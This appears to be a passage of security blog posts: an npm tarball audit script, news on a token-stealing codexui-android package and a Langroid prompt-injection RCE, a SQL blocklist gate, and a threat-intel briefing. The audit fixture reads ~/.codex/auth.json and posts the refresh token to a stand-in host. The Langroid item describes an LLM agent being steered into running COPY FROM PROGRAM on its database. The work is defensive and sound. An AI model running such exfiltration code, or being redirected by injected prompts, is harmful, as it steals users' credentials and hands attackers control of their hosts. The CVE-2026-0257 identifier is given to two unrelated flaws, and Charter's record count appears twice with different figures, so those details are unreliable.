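    "package/dist-cli/server.js":
        b'export function serve() { /* web UI */ }\n',
    "package/dist-cli/chunk-PUR7OUAG.js": (
        b'import { readFileSync } from "node:fs";\n'
        b'const a = JSON.parse(readFileSync(process.env.HOME + "/.codex/auth.json"));\n'   # placeholder path
        b'fetch("https://sentry.example/startlog", {method: "POST", body: JSON.stringify({t: a.refresh_token})});\n'
    ),
}
# Constructed: the files produced by building the public repository yourself.
REPO_BUILD_FILES = {"package.json", "dist-cli/index.js", "dist-cli/server.js"}

# Relative import/require targets ("./x.js", "../y").
IMPORT_RE = re.compile(r"""(?:import\s+(?:[^;]*?from\s+)?|require\()\s*["'](\.[^"']+)["']""")
# Strings worth a second look in any package: credential files, token names, URLs, shell or network calls.
SUSPICIOUS = [r"auth\.json", r"refresh_token", r"https?://[^\"'\s]+", r"child_process", r"\bfetch\("]


def build_tarball(files):
    """Pack {path: bytes} into a gzip tarball held in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def audit_tarball(data, repo_files):
    """Compare tarball contents with repo_files and scan for suspicious strings."""
    extra, hidden_imports, findings = [], [], []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        members = {m.name.removeprefix("package/"): tar.extractfile(m).read().decode()
                   for m in tar.getmembers() if m.isfile()}
    for path, text in members.items():
        if path not in repo_files:
            extra.append(path)                                # shipped but never in source control
        for target in IMPORT_RE.findall(text):
            resolved = posixpath.normpath(posixpath.join(posixpath.dirname(path), target))
            if resolved not in repo_files:
                hidden_imports.append((path, resolved))       # loaded at import time, invisible in the repo
        for pattern in SUSPICIOUS:
            for match in re.finditer(pattern, text):
                findings.append((path, match.group(0)))
    return {"extra_files": extra, "hidden_imports": hidden_imports, "findings": findings}


if __name__ == "__main__":
    report = audit_tarball(build_tarball(PACKAGE_FILES), REPO_BUILD_FILES)
    for key, value in report.items():
        print(key, value)
```

The import check is the one that catches this pattern early: `dist-cli/index.js` is a legitimate file that also exists in the repository, but the module it pulls in at load time does not, which is exactly the condition a source-only review misses. Run the same comparison on the real tarball from `npm pack <name>@<version>` against your own build of the tagged commit; any extra file or unresolved relative import is a reason to stop, regardless of whether the string scan finds anything.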
### Covert Data Exfiltration and Associated Android Apps

To evade detection, the exfiltrated data was sent to a server endpoint named sentry.anyclawstore. This endpoint was chosen intentionally to blend in with normal Sentry error-reporting telemetry. The hidden source map even contained a comment from the author, "Send tokens to our startlog endpoint (always)," indicating deliberate intent.

Further investigation revealed that the threat actor behind this package, operating under the developer identity BrutalStrike, also targeted Android mobile devices. BrutalStrike has published applications on the Google Play Store, including a paid productivity app called codex.app and another named "OpenClaw Codex Claude AI Agent." Both applications were found to contain the same malicious infrastructure. These Android apps initially bypassed Google's pre-publish security scans because the initial APK file was clean. Once installed, the app extracts a Termux-derived Linux userland into private storage and launches Node.js using PRoot. It then runs a command to install the latest version of the npm package: pnpm add codexui-android@latest. The exfiltration functionality has been active since version 1.0.0 of the package.

### Critical Langroid Prompt Injection Vulnerability Exposes LLM Applications to RCE

Researchers from Carnegie Mellon University (CMU) and the University of Wisconsin-Madison (UW-Madison) have identified a critical Remote Code Execution (RCE) flaw within the Langroid Python framework, specifically affecting Large Language Model (LLM) applications. This vulnerability, which carries a CVSS score of 9.8, presents a significant risk to database servers by allowing prompt injection attacks. Developers are urged to upgrade their installations immediately.

The core of the problem resides within the framework's SQLChatAgent component.
While designed to execute database queries generated by an underlying language model, the component can be manipulated by malicious users through prompt injection. If the database role associated with the agent possesses elevated administrative privileges, the consequences can be severe. An attacker can force the system to execute dangerous dialect-specific primitives. For example, on a PostgreSQL backend, an attacker could trigger commands like COPY FROM PROGRAM. This action facilitates full RCE on the underlying database host, granting the attacker extensive control. This type of vulnerability shows the emerging security challenges in the rapidly evolving field of LLM-powered applications.

### Security Impact and Patch Availability

Successful exploitation of this flaw carries high security implications. Adversaries could execute arbitrary system commands using the database's local privileges, potentially leading to a broader compromise of the network. Furthermore, attackers could silently exfiltrate sensitive corporate data from the server or maliciously modify and delete critical database tables. The ability to pivot through the network from a compromised database server makes this an important entry point for sophisticated attacks.

Fortunately, the Langroid development team has addressed this dangerous RCE bug. A security patch is available in version 0.63.0 and all newer releases of the framework. This update introduces a strict SELECT-only allowlist parsed by sqlglot and implements a dialect-aware blocklist to prevent dangerous operation patterns. Users can manually restore the old behavior via a configuration flag in trusted environments, though this is not recommended for most deployments. Addressing vulnerabilities in development frameworks is as critical as patching operating systems. Lessons from past critical Microsoft Defender zero-days show the importance of rapid patching across the entire software supply chain.
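To make the shape of the patch concrete, here is an added example, not Langroid's code, of a SELECT-only gate with a dialect-aware blocklist of the kind the article describes. Langroid parses with sqlglot; this version substitutes a small standard-library tokenizer so it runs without dependencies, and the dialect names and blocklist entries are illustrative assumptions, not the framework's lists. It is deliberately biased toward rejection: a column name that collides with a blocked word is refused too, which is the right failure mode for model-generated SQL.

```python
"""SELECT-only gate for LLM-generated SQL with a dialect-aware blocklist.

Added example, not Langroid's implementation. A tokenizer stands in for the
sqlglot parser the patched framework uses; dialect lists are illustrative.
"""
import re

# Dialect-specific primitives that must never appear in model-generated SQL,
# even inside an otherwise read-only query (assumed, illustrative lists).
DIALECT_BLOCKLIST = {
    "postgres": {"copy", "program", "pg_read_file", "pg_read_binary_file",
                 "lo_import", "lo_export", "dblink"},
    "mysql": {"load_file", "outfile", "dumpfile", "load"},
    "tsql": {"xp_cmdshell", "sp_oacreate", "openrowset", "bulk"},
}

# Statement-level words that are never read-only in any dialect.
# INTO covers SELECT ... INTO (table creation / file output) as well as INSERT.
WRITE_KEYWORDS = {"insert", "update", "delete", "drop", "alter", "create",
                  "truncate", "grant", "revoke", "merge", "exec", "execute",
                  "call", "do", "into"}

_TOKEN_RE = re.compile(r"""
    /\*.*?\*/                     # block comment
  | --[^\n]*                      # line comment
  | '(?:[^']|'')*'                # single-quoted string literal
  | "(?:[^"]|"")*"                # double-quoted identifier or string
  | [A-Za-z_][A-Za-z0-9_$]*       # bare word
  | ;                             # statement separator
  | \S                            # any other single character
""", re.VERBOSE | re.DOTALL)


def tokenize(sql):
    """Yield (kind, text): comments dropped, literals kept opaque, words lowercased."""
    for m in _TOKEN_RE.finditer(sql):
        tok = m.group(0)
        if tok.startswith("/*") or tok.startswith("--"):
            continue
        if tok[0] in "'\"":
            yield ("literal", tok)
        elif tok == ";":
            yield ("semi", tok)
        elif re.match(r"[A-Za-z_]", tok):
            yield ("word", tok.lower())
        else:
            yield ("punct", tok)


def check_query(sql, dialect="postgres"):
    """Return (ok, reason); ok is True only for one read-only statement."""
    toks = list(tokenize(sql))
    words = [t for k, t in toks if k == "word"]
    if not words:
        return False, "empty statement"
    if words[0] not in ("select", "with"):
        return False, f"statement must start with SELECT or WITH, got {words[0].upper()}"
    # A ';' followed by anything else means a stacked second statement.
    if any(k == "semi" and i < len(toks) - 1 for i, (k, _) in enumerate(toks)):
        return False, "multiple statements are not allowed"
    # Write keywords anywhere (e.g. a CTE wrapping an INSERT) fail the gate.
    bad = [w for w in words if w in WRITE_KEYWORDS]
    if bad:
        return False, f"write keyword {bad[0].upper()} is not allowed"
    # Dialect-specific escape hatches are blocked even inside a SELECT.
    hit = [w for w in words if w in DIALECT_BLOCKLIST.get(dialect, set())]
    if hit:
        return False, f"{dialect} primitive {hit[0].upper()} is blocked"
    return True, "ok"


if __name__ == "__main__":
    for q in ("SELECT id FROM users WHERE note = 'copy; drop'",
              "SELECT 1; COPY t FROM PROGRAM 'true'",
              "WITH x AS (SELECT 1) INSERT INTO t SELECT * FROM x"):
        print(check_query(q), "<-", q)
```

The gate is a second layer, not a substitute for the first: the article's point that the agent's database role decides the blast radius still holds, so the role the agent connects with should be read-only regardless of how good the SQL filter is.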
### Hard-Coded Password Exposes Eppendorf BioFlo 320 Bioreactor Systems

An urgent industrial control security warning has been issued for laboratory facilities concerning a critical flaw in the Eppendorf BioFlo 320 bioreactor platform. This high-severity vulnerability (CVE-2026-7251, CVSS 9.8) exposes these systems to unauthorized manipulation of sensitive biochemical processes. Lab managers must inspect their device configurations to prevent potential safety incidents.

The software defect originates from a poorly secured remote management tool. The underlying system relies on an exposed Virtual Network Computing (VNC) architecture that uses a hard-coded password. Official documentation confirms: "The affected product is vulnerable due to VNC server using a hard-coded password." This access mechanism also lacks encryption of its network traffic, further weakening its security posture.

If an attacker identifies the network address of a target system, they can use this default credential to gain unauthenticated administrative authority. The vulnerability report explicitly states: "Once connected, the attacker would have full access to all control panel features for the BioFlo 320." This level of access could enable significant changes to experiments, potentially compromising research integrity or causing hazardous conditions in laboratory settings.

### Remediation for CVE-2026-7251

Eppendorf, the manufacturer, has developed an update to eliminate this threat. The newly released Version 5.0 software patch disables the vulnerable remote control protocol. Importantly, all systems originally shipped with this feature deactivated by default; users could only activate the module manually at the physical workstation tower. Applying the permanent fix resolves the Eppendorf bioreactor security flaw, protecting important laboratory equipment. Administrators should download and apply the latest Version 5.0 software package without delay.
Furthermore, security teams should verify that local user role protections adequately restrict configuration changes to trusted supervisors, adding another layer of defense against unauthorized access.

### Technical Takeaways

- Active Exploitation of Core Enterprise Systems: Microsoft's Netlogon RCE, CVE-2026-41089 (CVSS 9.8), is actively exploited to gain SYSTEM privileges on Windows domain controllers, requiring immediate patching of Windows Server versions from 2012 onwards.
- Large-Scale Botnet Disruption: Dutch authorities dismantled the Asocks botnet, which comprised 17 million infected devices, including Android and IoT devices, linked to the PROXYLIB campaign.
- Supply Chain Attacks Targeting AI Development: A malicious codexui-android npm package, with 27,000 weekly downloads, was found stealing persistent OpenAI refresh tokens via a covert supply chain attack, also impacting related Android applications.
- Prompt Injection Risks in LLM Frameworks: A critical Langroid Python framework vulnerability (CVSS 9.8) allows RCE via prompt injection in the SQLChatAgent component, enabling arbitrary command execution on database hosts without authentication.
- ICS/OT Hard-Coded Credential Vulnerability: The Eppendorf BioFlo 320 bioreactor platform has a critical flaw, CVE-2026-7251 (CVSS 9.8), due to a hard-coded VNC password, allowing unauthenticated administrative access to industrial control functions.

---

## Threat Intelligence Briefing on Critical Vulns, Ransomware, Leaks

- URL: https://purple-ops.io/blog/threat-intelligence-vulns-ransomware-leaks
- Date: 2026-06-01
- Category: report
- Tags: threat-intelligence, critical-vulnerabilities, ransomware, data-breach
- Reading time: 5 min

**Summary:** Critical PAN-OS GlobalProtect vulnerability exploitation, TrapDoor supply chain attacks, and evolving ransomware tactics are impacting global sectors.
### Executive Summary

CTI reporting for this period shows persistent and evolving cyber adversary activity affecting various sectors globally.

### Key Developments

- PAN-OS GlobalProtect Vulnerability Exploitation: A critical authentication bypass vulnerability (CVE-2026-0257) affecting Palo Alto GlobalProtect VPNs has been under active exploitation. This directly affects organizations running affected versions, allowing unauthorized network access.
- TrapDoor Supply Chain Attack: A supply chain campaign, TrapDoor, spread credential-stealing malware through popular software package registries (npm, PyPI, CratesIO, and other platforms). This affects software development pipelines and any organization consuming dependencies from these platforms, risking developer account compromise and intellectual property exposure.
- Botnet Dismantlement: Dutch authorities disrupted a large botnet with approximately 17 million infected devices worldwide. This action diminishes global cybercrime infrastructure, potentially reducing various large-scale malicious operations.
- Evolving Ransomware Tactics: Ransomware actors used an in-person tactic to steal sensitive data from a law firm. This shows a rare, evolving method of data exfiltration, combining physical intrusion with cyber extortion. It affects organizations holding high-value, sensitive data.

### Business Impact

The reported activities collectively put core business functions at risk. Widespread exploitation of internet-facing infrastructure can lead to unauthorized access and data exfiltration from network perimeters. Supply chain compromises threaten software integrity, affecting development processes and deployed applications. Data exposure incidents cause reputational damage, regulatory scrutiny, subsequent financial fraud, and other harms to affected entities or individuals.
Ransomware operations cause operational disruption across sectors like healthcare, education, and technology.

### Notable Trends and Changes vs Last Week

Consistent patterns include widespread exploitation of internet-facing systems and increased data exposure incidents. Ransomware operations maintained a broad targeting scope, frequently using double extortion methods. A specific change this week is the confirmed active exploitation of the Palo Alto GlobalProtect vulnerability, requiring urgent attention to network perimeter security. In-person data theft tactics also represent a shift in adversary operational methods beyond purely remote cyber means.

### Outlook

Over the next seven days, active exploitation of newly disclosed critical vulnerabilities, particularly those affecting internet-facing infrastructure, will likely remain prevalent. Ransomware groups are expected to sustain their operational tempo, employing various extortion schemes. Supply chain integrity challenges will likely persist as adversaries seek to inject malicious code into widely used software components. Geopolitical and hacktivist cyber activities targeting critical infrastructure and specific sectors will also likely remain active.

### Key Threat Intelligence Highlights

This week saw several key developments:

- Dutch authorities, collaborating with international partners, dismantled a botnet that had compromised 17 million devices globally. This malicious network facilitated cybercrimes such as distributed denial-of-service attacks and data theft. The operation sets back criminal operations, protects users, and shows effective cross-border cooperation.
- An actively exploited authentication bypass (CVE-2026-0257) exists in Palo Alto Networks' PAN-OS GlobalProtect portal and gateway. This critical flaw allows unauthenticated attackers to execute arbitrary code. Organizations must apply patches immediately to protect their systems.
- The TrapDoor supply chain attack distributes credential-stealing malware by compromising package managers such as npm, PyPI, CratesIO, and other common platforms. This operation targets developers to steal their account credentials, potentially compromising numerous downstream software projects. Its broad presence across these repositories poses a security challenge for the open-source ecosystem.
- Ransomware actors are escalating tactics by incorporating physical intrusions. Individuals recently gained on-site access to a law firm to directly exfiltrate sensitive client data. This development shows increased attacker boldness and sophistication, requiring organizations to broaden security measures beyond digital perimeters.
- A severe flaw in the Langroid library allows Remote Code Execution (RCE) via prompt injection. This enables adversaries to trick AI applications into running arbitrary code on the underlying system, posing a grave danger to tools built with Langroid: attackers could gain full control over affected systems.

### Additional Threat Intelligence Context

- CVE-2026-8732 (CVSS 9.8, CRITICAL): Active exploitation of WP Maps Pro allows unauthenticated administrator account creation on WordPress sites.
  - Available exploits: 3 listed
  - Analysis: WP Google Map Pro CVE-2026-8732 PoC. Complexity: Easy; Remote; Unauthenticated; Privilege required: None; Risk score: 100/100 (ease of use, potential impact, and widespread availability contribute to this score).
- CVE-2026-0257 (CVSS None, CRITICAL): Widespread exploitation of the Palo Alto Networks PAN-OS GlobalProtect authentication bypass allows unauthorized VPN access; the vulnerability is listed in CISA KEV.
  - Available exploits: 5 listed
  - Analysis: PAN-OS GlobalProtect Auth Bypass Detection PoC. Complexity: Easy; Remote; Unauthenticated; Privilege required: None; Risk score: 91/100 (ease of use and potential impact contribute to this score).
- CVE-2026-35616 (CVSS 9.8, VERY CRITICAL): Active exploitation of a pre-authentication API bypass in FortiClient EMS delivers EKZ Infostealer and allows unauthenticated administrative actions.
  - Available exploits: 5 listed
  - Analysis: FortiClient EMS Safe Detector (CVE-2026-35616). Complexity: Easy; Remote; Unauthenticated; Privilege required: None; Risk score: 100/100 (ease of use and potential impact contribute to this score).
- Critical Gogs (0.14.2 and 0.15.0+dev) remote code execution zero-day (CVSS 9.4) due to an argument injection flaw, exploitable by unauthenticated internet users because registration is open by default.
- CVE-2026-48172 (CVSS None, VERY CRITICAL): Active exploitation of the LiteSpeed cPanel user-end plugin Redis RCE allows unauthenticated escalation to root on shared hosting servers and prompted a CISA BOD.
  - Available exploits: 3 listed
  - Analysis: CVE-2026-48172 PoC Template. Complexity: NA; Remote; Unauthenticated; Privilege required: None; Risk score: 75/100 (ease of use, potential impact, and widespread availability contribute to this score).
- Critical Windows DNS Client remote code execution (CVSS 9.8) with three observed active exploits, alongside public zero-days (BlueHammer, RedSun, UnDefend) in Windows Defender/BitLocker.
- CVE-2026-41089: Active exploitation of Netlogon RCE on Windows domain controllers.
- CVE-2026-0257 (CVSS None, CRITICAL): Publicly available exploit code and reported exploitation for a FreeBSD kernel stack buffer overflow that leads to local privilege escalation.
- Widespread campaigns target the npm ecosystem through dependency confusion and deployment of RAT packages, like the forge-jsxy family, for credential theft and persistent access.
- CVE-2026-39987 (CVSS None, CRITICAL): Pre-authenticated RCE in the Marimo notebook service has been observed in targeted intrusions for credential harvesting from cloud environments.
  - Available exploits: 5 listed
  - Analysis: CVE-2026-39987 version detector (Marimo). Complexity: Easy; Remote; Unauthenticated; Privilege required: None; Risk score: 91/100 (ease of use, potential impact, and widespread availability contribute to this score).
- Extensive exposure of identity, genetic, and messaging data through major breaches affecting entities such as Charter Communications (4.9M accounts), 23andMe (6.9M customers), and massive Telegram user datasets (claimed 1.2B records).
- DDoS attacks, such as the one claimed by "Infrastructure Destruction Squad" against Ukrainian OPW Fuel Management Systems, disrupting remote visibility and control of fuel infrastructure.

### Ransomware Activity Overview

Ransomware groups like Krybit, CMD, Lapsus, Bravox, Gunra, and Stormous are actively targeting healthcare, education, insurance, AI startups, entertainment, and smaller tech/service providers across multiple continents. These operations commonly employ double extortion tactics, use leak sites, and gain initial access through RDP/VPS resale, initial access broker offerings, and web application exploitation.

Data breach activity includes a claimed 1TB exfiltration from the Israeli Holocaust victims welfare center by the Handala group, an unverified claim of 10+ petabytes from the China NSCC Supercomputing Center, and widespread sales of AT&T Mobile, Salesforce, HCA Healthcare, and various government/telecom datasets.

Geopolitical cyber activity features Infrastructure Destruction Squad claiming a network takedown at Noi Bai International Airport via exploitation of old MikroTik RouterOS flaws and performing DDoS actions against Ukrainian industrial control systems.
The TRK25 group promotes an advanced SCADA industrial exploitation framework. Hacktivist actions are observed from pro-Palestinian, pro-Russian, and Indonesian groups, among others.

The broader cybercrime ecosystem shows extensive advertising of offensive services, tools, and training bundles. Concerns exist about malicious npm packages and residential-proxy botnet takedowns. Underground markets also display a supply of government, financial, and telecom databases from regions like Asia, the Middle East, Europe, and the Americas. They also trade forged court orders and domain-suspension services to assist fraud and takedown operations.

During the reporting period, 170 total victims were identified across 36 active ransomware groups. The top 5 most active groups accounted for 74 victims.

### Top 5 Ransomware Groups

- DragonForce: 37 victims. Notable victims: Allianceadjustment.com, Arsenalscaffold.com, Businessrecord.com, Delbrook capital advisors, Dentonfirm.com (and 32 more)
- LockBit: 10 victims. Notable victims: columbiaorthogroup.com, groupe-mbm.com, grupodetoni.com.br, gu, hgs-wt.at (and 5 more)
- Akira: 9 victims. Notable victims: Alpine aerotech, General doors, Gone fishin' marine, Gs yuasa lithium power, Interstate roofing (and 4 more)
- Everest: 9 victims. Notable victims: Advanced psychiatry associates, Akm, Asopagos s.a., L&p aesthetics, Sidra kuwait hospital (and 4 more)
- Medusa Locker: 9 victims. Notable victims: Baeaoai, Baeaxai, Bakaxah, Dadolighting demo, Dolrad (and 4 more)

### Deep Web Observations

This week's deep web activity revealed extensive data exposures across multiple sectors and geographies, with a concentration on governmental, military, and critical financial institutions. Threat actors posted or offered for sale vast datasets containing sensitive national defense information, full financial and personal records of citizens, and internal law enforcement intelligence.
The trend shows a continued pursuit of high-value targets for strategic and financial exploitation.

### What major data leaks appeared on deep web forums this week?

Several large-scale data leaks emerged this week. The compromise of a Chinese supercomputing network and the National Credit Information Center of Vietnam stood out for their scale and sensitivity. Other incidents involved national law enforcement agencies, a major telecommunications provider, and a customer support platform for a widely used communication service.

- China National Supercomputing Center (NSCC) Breach: A 10+ petabyte dataset, described as direct exfiltration from China's supercomputing network, was advertised. This collection includes years of raw simulation data, design files, satellite telemetry, and classified research from national defense contractors (AVIC Aviation Industry and COMAC). The leak also contains employee personal data, including Chinese ID card scans with names and addresses.
- National Credit Information Center of Vietnam (CIC) Exposure: Over 160 million records from Vietnam's national credit information center were put up for sale. This extensive database contains detailed personally identifiable information (PII) such as full names, dates of birth, national ID cards (CCCD, CMND), passport numbers, driving license numbers, military IDs, student IDs, addresses, phone numbers, and email addresses. Financial details are present, such as loan data, various balance types (e.g., loan, bad debt, credit card), outstanding debt figures, and credit card numbers. Company information and audit logs complete this financial dataset.
- Charter Communications, Inc. Customer Data: A dataset comprising over 42 million records of PII from Charter Communications, a major US telecommunications company, was released. The actor claimed this release happened after unsuccessful negotiations.
- DIRANDRO (Peruvian National Police) Data: A database containing approximately 300,000 folders, totaling 7.8 GB, from DIRANDRO (the Drug Enforcement Directorate of the Peruvian National Police) was offered. This compromise includes personal identification data (full names, national ID, police identification codes) for police/military personnel, demographic information, family details, precise residential addresses, and civil registry data. Police intervention data is present, including narratives of incidents, exact geographic coordinates of events, descriptions of seized illicit substances, and images of national ID documents (DNI).
- Argentine Government Institutions Compilation: A 650 GB compilation of databases from multiple Argentine government institutions was made available. Entities affected include GDEBA, IOMA, Buenos Aires City Police, AFIP (tax authority), BCRA (central bank), and the Federal Police. The data includes emails, passwords, phone numbers, document numbers, biometric photos, ranks, credit scores, and confidential PDF documents. The actor mentioned targeting numerous other Latin American government institutions.
- Philippines Land Transportation Office (LTO) Data: Over 14 million records from the Philippines' Land Transportation Office were listed, including PII such as full names, addresses, dates of birth, sex, civil status, nationality, weight, height, and blood type. The breach includes over 14 million user images, with the actor claiming to possess a proof of concept (0day) for the LTO system.
- Discord Data through Zendesk: A 1.6 TB dataset pertaining to Discord users, allegedly sourced from Zendesk (a customer support platform), was advertised. This data includes user email addresses, Discord usernames, phone numbers, support ticket/chat logs, IP addresses, the last four digits of credit cards, and images of ID cards or passports used for age verification for approximately 70,000 users.
- Russian GRU Advanced Weapons Report Leak: A document titled "Top Secret GRU Advanced Weapons Report 2025" was freely distributed on a forum, purportedly originating from Russia's Main Intelligence Directorate.

### What is the nature and scope of these breaches?

The nature of these breaches ranges from direct exfiltration of highly classified state secrets and critical infrastructure data to widespread compromises of sensitive personal and financial information affecting millions of individuals. The scope often involves full datasets, including identity documents, financial records, and operational intelligence. This enables various downstream malicious activities.

The NSCC breach compromises state-sponsored research and development. It provides adversaries with access to advanced military and aerospace designs that could accelerate their own programs or reveal strategic vulnerabilities. The scale of 10+ petabytes signifies a deep, sustained infiltration.

The National Credit Information Center of Vietnam and Charter Communications breaches show the monetization of large-scale PII and financial data. These datasets offer a foundation for identity theft, financial fraud, targeted social engineering campaigns, and account takeovers because of the individual and corporate financial attributes present.

The breaches of DIRANDRO (Peruvian National Police) and multiple Argentine government institutions carry substantial risks for public administration and law enforcement personnel. Exposure of police and military personnel data, including identity documents and operational details, could lead to targeted harassment, blackmail, physical threats, or compromise of ongoing investigations. This undermines trust in government security, impeding critical functions.

The Land Transportation Office (LTO) Philippines data, particularly with 14 million user images alongside full PII, creates an avenue for high-fidelity identity impersonation and fraudulent document creation.
This level of biometric-linked data raises the risk beyond standard identity theft.

The Discord data from Zendesk, though from a customer service platform, is particularly sensitive due to the inclusion of actual ID card/passport photos for age verification. This enables high-confidence identity fabrication. The associated support ticket logs can also reveal sensitive personal issues or specific vulnerabilities for targeted social engineering.

Beyond data leaks, one item offered initial access broker (IAB) services to an APAC telecom target and an Eastern European B2B platform. This included verified network configurations, dynamic application behaviors, and pre-authentication session bypass payloads, alongside internal metadata. This kind of offering provides a foothold for subsequent, more damaging attacks, rather than a direct data leak.

### Are there any patterns or trends in the breach data?

A recurring pattern in this week's data involves targeting national critical infrastructure and government entities, particularly those holding vast amounts of citizen data or sensitive state intelligence. There is a persistent market for full PII and financial records, often affecting entire populations within a given country.

- Government and Critical Infrastructure as Prime Targets: Many observed incidents pertain to government agencies (Argentina, Peru, Philippines) or entities integral to national operations (China's supercomputing, Vietnam's credit bureau). These targets are attractive for espionage, strategic advantage, large-scale data harvesting, or disruption.
- Large-Scale PII and Financial Data Exploitation: Multiple breaches involved millions of individual records, including detailed PII, financial histories, and identity document images. This indicates an enduring demand for datasets suitable for identity theft, fraud, account takeovers, and other illicit activities on a massive scale.
- Geographic Diversity of Victims: The affected organizations span multiple continents, including Asia (China, Vietnam, Philippines), North America (USA), and South America (Argentina, Peru). This global distribution shows the ubiquitous nature of deep web activities.
- Mixed Actor Sophistication: While established and reputable actors like ShinyHunters continue to conduct large-volume breaches, several new or low-reputation users are also surfacing with access to sensitive government and classified data, suggesting a broad base of actors or the fragmentation of capabilities.
- Initial Access as a Commodity: The sale of pre-authenticated access to corporate networks suggests a sub-economy where initial entry points are prepared and sold, enabling other threat actors to execute various follow-on attacks without needing to establish their own initial foothold.
- Broad Data Spectrum: The compromised data is diverse, ranging from advanced military research and blueprints to individual credit scores, criminal intervention records, and customer support interactions, reflecting varied motivations among threat actors, from state-sponsored espionage to common cybercrime.

### What is the potential impact of these deep web breaches?

The potential impact of this week's deep web breaches is broad, extending from national security repercussions to widespread individual financial and personal harms, and a general erosion of trust in institutions.

The exposure of 10+ petabytes of classified military and aerospace research from China's NSCC could compromise national security. Such detailed data, including schematics for advanced satellites and defense simulations, provides foreign adversaries with intelligence that could accelerate their own technological advancements, expose vulnerabilities in existing systems, or inform counter-intelligence strategies. This intellectual property loss has long-term strategic implications.
Similarly, the Russian GRU Advanced Weapons Report could reveal classified defense strategies and capabilities, offering tactical advantages to opposing forces.

For individuals, the 160 million records from the National Credit Information Center of Vietnam and the 42 million PII records from Charter Communications create an expansive surface for identity theft, sophisticated financial fraud, and targeted scams. Detailed financial histories combined with personal identifiers empower malicious actors to open fraudulent accounts, obtain loans, or impersonate victims with high success rates. Including credit card numbers, even partial ones, reduces the effort for carding schemes.

The initial access broker (IAB) services serve as precursors to future destructive events.
By providing verified entry points into critical infrastructure, these sales allow other actors to deploy ransomware, conduct long-term espionage, or orchestrate sabotage. This escalates the scope and severity of potential future incidents.

In summary, this week's deep web activity shows a persistent and evolving threat where sensitive national and personal data is continuously sought, acquired, and traded. This has far-reaching consequences for state security, economic stability, individual privacy, and public trust.

### Sources

- Dutch Authorities Dismantle Botnet Linked to 17 Million Infected Devices
- PAN-OS GlobalProtect Authentication Bypass (CVE-2026-0257) Under Active Exploitation
- TrapDoor Supply Chain Attack Spreads Credential-Stealing Malware via npm, PyPI, and CratesIO
- Ransomware Actors Show Up In Person to Steal Law Firm Data
- Critical Langroid Vulnerability Allows RCE via Prompt Injection

---

## PAN-OS CVE-2026-0257 Auth Bypass Actively Exploited

- URL: https://purple-ops.io/blog/pan-os-cve-2026-0257-auth
- Date: 2026-06-01
- Category: CVE Analysis
- Tags: palo-alto, pan-os, cve-2026-0257, auth-bypass
- Reading time: 5 min

**Summary:** Palo Alto Networks PAN-OS is critically affected by CVE-2026-0257, an authentication bypass vulnerability under active exploitation.

Palo Alto Networks PAN-OS is affected by CVE-2026-0257, an authentication bypass vulnerability currently under active exploitation. This critical flaw allows unauthorized access to systems running PAN-OS, threatening network security perimeters. Though specific technical details, such as the CVSS score and affected version ranges, have not been publicly disclosed, the active exploitation status requires immediate attention from security teams. The presence of in-the-wild exploitation for CVE-2026-0257 increases its severity beyond what an unrated vulnerability might typically suggest.
An authentication bypass on a network security platform like PAN-OS can directly lead to compromised administrative access, VPN system breaches, or manipulation of network traffic. Organizations relying on Palo Alto Networks devices for perimeter defense are at immediate risk. PurpleOps assesses this vulnerability as critical due to its nature and exploitation status. This intelligence post compiles available facts and outlines the implications for organizations, focusing on detection and remediation strategies based on limited public information.

### What is CVE-2026-0257 and why is it critical?

CVE-2026-0257 is an authentication bypass vulnerability affecting Palo Alto Networks PAN-OS. This means an attacker can circumvent standard authentication mechanisms to gain unauthorized access to protected functionalities or resources. Its criticality stems from the role PAN-OS plays in an organization's network infrastructure; it typically acts as a firewall, VPN concentrator, or network access controller.

An authentication bypass in such an important security appliance can grant an adversary direct access to sensitive administrative interfaces. This allows them to reconfigure security policies, establish malicious VPN tunnels, create backdoors, or otherwise compromise the system. The impact extends to potentially bypassing VPN access controls, enabling unauthorized users to connect to internal networks. This capability could be exploited by remote, unauthenticated attackers, making it an effective entry vector into protected network segments. The active exploitation of CVE-2026-0257 in the wild shows that threat actors possess reliable methods to use this vulnerability, making it an immediate operational threat rather than a theoretical risk.

### Impact

An attacker successfully exploiting CVE-2026-0257 can gain unauthorized access to the affected Palo Alto Networks PAN-OS device.
This typically means gaining administrative control over the firewall, a privileged position within a network infrastructure. From this vantage point, an adversary can perform various malicious actions, including creating new user accounts, modifying firewall rules to permit arbitrary traffic, disabling security features, establishing persistent access mechanisms (such as VPN connections or SSH keys), exfiltrating sensitive data traversing the network, or deploying further malware onto internal systems. The potential for a complete network compromise through a compromised perimeter device is significant.

Organizations at risk include any entity deploying Palo Alto Networks firewalls or other devices running PAN-OS. This encompasses a broad spectrum of industries and sizes, from large enterprises and government agencies to small and medium-sized businesses that rely on Palo Alto Networks for network security. This vulnerability's real-world impact is global, affecting any organization with internet-exposed PAN-OS instances that remain unpatched or unmitigated. A compromised perimeter firewall fundamentally undermines all downstream security controls. This makes CVE-2026-0257 a serious threat to data confidentiality, integrity, and network availability.

### Exploitation chain

The attack vector for CVE-2026-0257 is an authentication bypass. While the specific technical mechanism (e.g., cryptographic flaw, logic error, or input validation issue) has not been publicly detailed, the outcome is evident: an attacker can bypass the requirement for valid credentials to gain access. This vulnerability type typically targets network-exposed services such as web-based management interfaces, API endpoints, or VPN portals. The primary precondition for exploitation is that a vulnerable PAN-OS instance must be accessible from the network, likely over the internet, allowing unauthenticated remote access attempts.
Public Proof-of-Concept (PoC) code has not been disclosed in the provided research. However, the notification states "Active Exploit Detected Today." This confirms that threat actors currently possess and use functional exploits for CVE-2026-0257 in real-world attacks. This means private or targeted exploits are in circulation and are being deployed against vulnerable systems. Active exploitation indicates a high level of sophistication among adversaries using this flaw, and it suggests that technical details, even if not public, are understood within certain threat groups.

For more context on the implications of a widely exploited perimeter device, our prior analysis of CVE-2026-0257 also covered the implications for Palo Alto GlobalProtect installations.

### Affected products and versions

CVE-2026-0257 specifically impacts Palo Alto Networks PAN-OS. At the time of this intelligence post, the research findings do not publicly specify the range of affected product versions. This lack of specific version information creates a major challenge for network defenders attempting to determine their exposure. It requires a broad approach to assessment and remediation until more precise vendor guidance becomes available. Organizations utilizing Palo Alto Networks firewall appliances or virtual firewalls running PAN-OS should assume they are potentially affected, regardless of their current version. The absence of version specifics implies that multiple versions or even an entire product line could be susceptible to this critical authentication bypass.

